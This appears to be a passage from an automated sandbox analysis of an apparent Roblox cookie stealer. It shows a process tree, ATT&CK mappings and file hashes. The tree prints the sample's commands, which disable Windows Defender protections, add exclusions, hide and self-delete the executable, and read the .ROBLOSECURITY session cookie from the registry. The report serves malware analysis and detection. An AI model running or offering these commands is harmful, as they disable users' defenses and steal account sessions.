        Command and Scripting Interpreter: PowerShell
        
        PID:3360
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        47⤵
        Detects videocard installed
        
        PID:2600
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        47⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3320
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        48⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        46⤵
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        46⤵
        
        PID:1864
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        47⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        47⤵
        
        PID:3212
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        47⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        48⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        48⤵
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        48⤵
        
        PID:1300
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        49⤵
        Drops file in Drivers directory
        
        PID:1976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        50⤵
        
        PID:2188
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        50⤵
        Views/modifies file attributes
        
        PID:392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        50⤵
        
        PID:1364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        50⤵
        
        PID:3580
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        50⤵
        
        PID:4220
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        50⤵
        
        PID:5020
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        51⤵
        
        PID:4528
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        50⤵
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        50⤵
        
        PID:1596
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        51⤵
        
        PID:2760
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        50⤵
        Detects videocard installed
        
        PID:3980
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        50⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3144
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        51⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        49⤵
        
        PID:4892
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        49⤵
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        50⤵
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        50⤵
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        50⤵
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        51⤵
        
        PID:568
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        51⤵
        
        PID:576
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        51⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        52⤵
        Drops file in Drivers directory
        
        PID:1176
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        53⤵
        
        PID:1008
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        53⤵
        Views/modifies file attributes
        
        PID:5096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        53⤵
        
        PID:3012
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        53⤵
        
        PID:2488
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        53⤵
        
        PID:3536
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        53⤵
        
        PID:3912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        53⤵
        
        PID:900
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        53⤵
        Detects videocard installed
        
        PID:976
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        53⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1448
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        54⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        52⤵
        
        PID:3620
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        52⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        53⤵
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        53⤵
        
        PID:344
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        53⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        54⤵
        
        PID:3492
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        54⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        54⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        55⤵
        
        PID:2600
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        56⤵
        
        PID:3368
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        57⤵
        
        PID:1008
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        56⤵
        Views/modifies file attributes
        
        PID:332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        56⤵
        
        PID:3800
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        56⤵
        
        PID:4556
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        56⤵
        
        PID:2380
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        56⤵
        
        PID:1380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        56⤵
        
        PID:2000
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        56⤵
        Detects videocard installed
        
        PID:2636
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        56⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4376
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        57⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        55⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        55⤵
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        56⤵
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        56⤵
        
        PID:3920
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        56⤵
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        57⤵
        
        PID:780
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        57⤵
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        57⤵
        
        PID:1032
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        58⤵
        
        PID:1744
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        59⤵
        
        PID:2244
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        59⤵
        Views/modifies file attributes
        
        PID:3720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        59⤵
        
        PID:2320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        59⤵
        
        PID:3056
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        59⤵
        
        PID:4556
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        59⤵
        
        PID:2780
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        59⤵
        
        PID:4328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        59⤵
        Detects videocard installed
        
        PID:3664
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        59⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1556
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        60⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        58⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        58⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        59⤵
        
        PID:4856
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        59⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        59⤵
        
        PID:4308
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        60⤵
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        60⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        60⤵
        
        PID:3464
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        61⤵
        
        PID:4416
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        62⤵
        
        PID:1708
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        62⤵
        Views/modifies file attributes
        
        PID:2160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        62⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        61⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        61⤵
        
        PID:4360

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BootstrapperV1.23.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Injector.exe.log

Filesize
1KB

MD5
b51beb4423c86427f672916554030c47

SHA1
9b97736d8434b62ef627a4ee8484e26c719924a8

SHA256
df796564c34fb36085aa25452d44ead56fba39aa18e80cb4ba1c30becca0dfea

SHA512
262fc9e9cddee9ae3c733bb961f44f27628783961db101aabc868765ba0e2aafdcb8f9b689f1abd4613836ed9cf3064e92cbd10495c83fe04dd2a496db3485d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
38ecc5b95c11e5a77558753102979c51

SHA1
c0759b08ef377df9979d8835d8a7e464cd8eaf6b

SHA256
2eb69abe0af5a2fb5bb313533cef641e25016876b874353f7d737c7ad672c79e

SHA512
9bf4ce3bc097bdd0242bd105c936a9c9403d5ac83ec99e6a310591a7b8d26309485f3e0cdc4cba67c322f834c325a2b63a008adb078f3a3307094c4b68a48686

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e34fe0bf9e5223ae7102977b1e9fb468

SHA1
84a4edbf20c9262a6ba83ddcd04792383b0a7ace

SHA256
e7140391d9aa9ca5619d2440c03f72aeacb8982461ee24bc2bdcc881220d30f7

SHA512
6e3d94d91dcffc02c5f8327c77e39b0375eee30c88f0a2c4a658a881bb0b34808805677233ce25bfbf6e8d3b01b6ae10aaab14ffec109da96691cb4605a76269

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
050567a067ffea4eb40fe2eefebdc1ee

SHA1
6e1fb2c7a7976e0724c532449e97722787a00fec

SHA256
3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e

SHA512
341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
781da0576417bf414dc558e5a315e2be

SHA1
215451c1e370be595f1c389f587efeaa93108b4c

SHA256
41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe

SHA512
24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
051a74485331f9d9f5014e58ec71566c

SHA1
4ed0256a84f2e95609a0b4d5c249bca624db8fe4

SHA256
3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888

SHA512
1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3f6782e9efc05a9bf8b8dc803a5fcbc9

SHA1
f610eaa889a504cf1118ec63bcc504c4b797e8c6

SHA256
774db181f85af841f045f785f8e253c72848fc4bd0fb867f67c5e8dcbb19064a

SHA512
a404de6b21c032b4cad6569816c4e7d95a025191a4b4ce7d312bbd2bc71c868413e2b790433641714c1120c52712ae43c45cb7a9c9be59f18031c01a773ab4c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
1dff1d52bd250f8cb10a5c48dcf8f8a2

SHA1
19670814a2c3cd73fe445fce3bc735de77449b52

SHA256
ddea7fc83aed259afcff514859bed22eae148a18d3d937b7206633db731d7a6a

SHA512
3b3819a5b0d249f5b45150d3b89ee90fc00350bfb2b2b119724f1429d9e3f09a7a9badeb09c09070f68342a4d76549784183c861fb724b67c0cd6f64eb2d4bd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5f77dbb4c2c8b8b3cfcbd029ae919eba

SHA1
6ca170dd18515ce91d6f1479d27c2091138e2b10

SHA256
3758e01c487a4c1628285ef5d56570f8684859ab232c767ba43a6d48d99936a1

SHA512
5df8cecd61083bf55b07ab31a5b8a9105007d67495d72bf4798dc55b0d7e0ae9f7cbba6942376052bf26dfdf07ce6d6c4c842694663a8ef7a117a20a7e9e5d30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
50b7ac1c72646fb52f737ad8d8838c93

SHA1
04c143d74e976a9739e9caa9c07abfe71df97396

SHA256
dd0eaac71d73362392e2e0c4bcac866d5783f54259665c9d0cbdfee57a48e1e4

SHA512
e9d6371389b0ce2ad2a900dbb24e742a1fbbe721b5e7d14ca238ad889ae75b96342615a2197db322cbb39aa7ca573f42beb0092abc75d660d54925c09d3c06fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
35a4b82e6174e041adc14a927b01c03f

SHA1
02aa4791e62a3dd838cdb35fde862c9af1402eab

SHA256
8003d67125676f988a51260b24fa23df3aa04286c8b6737482824a66c5ed55de

SHA512
5cef8ed04ee8c209584fec3bfe15c6f7fd84d70110a749397d97dbaa0dfbd6259051da5834057e4c056bf4946ee6f5ef67b4cfa27a557a8f55b646ba9954d886

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fcbfea2bed3d0d2533fe957f0f83e35c

SHA1
70ca46e89e31d8918c482848cd566090aaffd910

SHA256
e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

SHA512
d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
9e189a46e645ff30b93ea3d4c1386a39

SHA1
16b4fe116d8d76414cc68c929524020739e8ad87

SHA256
a0f052db1cd54d1a2e1c6c140063d65cb9793ed59865147275d2a1ee10166076

SHA512
306992440bbd1b934d07d3547372a0890b6e2f87308e5a4ac3e8c4c43abcd4cb7826508cf6a61bc2f167af6e311906485dda490808558a2cd4c72a6676c00994

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
57083a8e45ebe4fd84c7c0f137ec3e21

SHA1
857b5ea57f7bcf03cadee122106c6e58792a9b84

SHA256
f20102c4dc409cad3cdaf7a330c3a18a730a9d7d902b9fbee2a84186cba93d40

SHA512
